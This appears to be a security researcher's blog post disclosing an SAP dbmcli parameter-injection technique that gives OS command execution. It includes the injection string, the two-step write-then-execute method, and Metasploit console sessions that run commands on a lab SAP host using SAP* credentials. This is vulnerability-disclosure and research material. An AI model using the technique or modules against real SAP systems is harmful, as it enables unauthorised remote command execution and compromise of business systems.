SAP Parameter Injection

To quote Homer J Simpson, “All this computer hacking is making me thirsty. I think I’ll order a Tab”. Very apt words as I’ve been busy authoring many SAP MSF modules that I intend to release over the coming months coinciding with the delivery of my updated “SAP Slapping” materials at the Sec-T, T2 and DeepSec conferences. However I’ve decided to release a subset today as a small taster of what is to come.

Context IS recently identified and reported a vulnerability within SAP’s Host Control service. This vulnerability can be used to achieve remote unauthenticated arbitrary command execution on Windows SAP systems. This is possible on systems that make use of SAP MaxDB as the supporting database. The exploitation of this vulnerability requires the submission of arbitrary parameters to the dbmcli executable and the executable is part of the SAP MaxDB installation.

The technique employed involves causing the executable to write attacker-controlled inputs to an attacker-controlled file. The executable is then used to read commands to execute from the same file. For example passing the following command line to the dbmcli executable results in the creation of a file named pwned.txt in the /tmp folder.

-o /tmp/pwned.txt –n pwnie\n!id\tfoo\n

The contents of the file are presented below.

Error! Connection failed to node pwnie
!id
 for database (no dbname):
unknown host pwnie
!id
 (see /etc/hosts

If the file is passed to the binary as illustrated in the command line below, then the commands prepended with an exclamation mark will be executed (in this case twice).

-ic /tmp/pwned.txt

The Remote Function Calls (RFCs) SXPG_CALL_SYSTEM and SXPG_COMMAND_EXEC can be used remotely to execute OS commands on SAP systems (as configured in transaction SM69). I previously blogged about this and the post can be found here. Authentication and relevant permissions are required.

On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands by injecting metacharacters; however on Linux they cannot – until now of course. By making use of the same exploit technique that Context IS did for the exploitation of the SAP Host Control vulnerability, we can execute arbitrary commands against Linux systems.

I have crafted several Metasploit modules to demonstrate this vector and the execution of the RFC SXPG_CALL_SYSTEM via the SOAP connector can be seen below.

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CLIENT   001              yes       Client
  CMD      id               yes       Command to run
  OS       Linux            yes       Windows/Linux
  PASS     06071992         yes       Password
  Proxies                   no        Use a proxy chain
  RHOSTS   172.16.252.150   yes       SAP ICM server address
  RPORT    8042             yes       SAP ICM server port number
  THREADS  1                yes       The number of concurrent threads
  USER     SAP*             yes       Username
  VHOST                     no        HTTP server virtual host

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!id
  uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > set CMD uname -a
CMD => uname -a
msf  auxiliary(sap_soap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response
[*] 172.16.252.150:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] 172.16.252.150:8042 - got response

[SAP] SXPG_CALL_SYSTEM dbmcli Command Injection
===============================================

  Output
  ------
  ;!uname	-a
  Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output below illustrates the execution of the RFC SXPG_CALL_SYSTEM from the module directly against the RFC connector.

msf  auxiliary(sap_rfc_dbmcli_sxpg_call_system_command_exec) > run

[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.150:3342 [SAP] Successful login - 001:SAP*:06071992

[SAP] Command Exec
==================

   Output
   ------
   
   >!id
   uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

These modules and many more will be released and submitted to the framework very soon. In the mean time you can download the modules to try from here: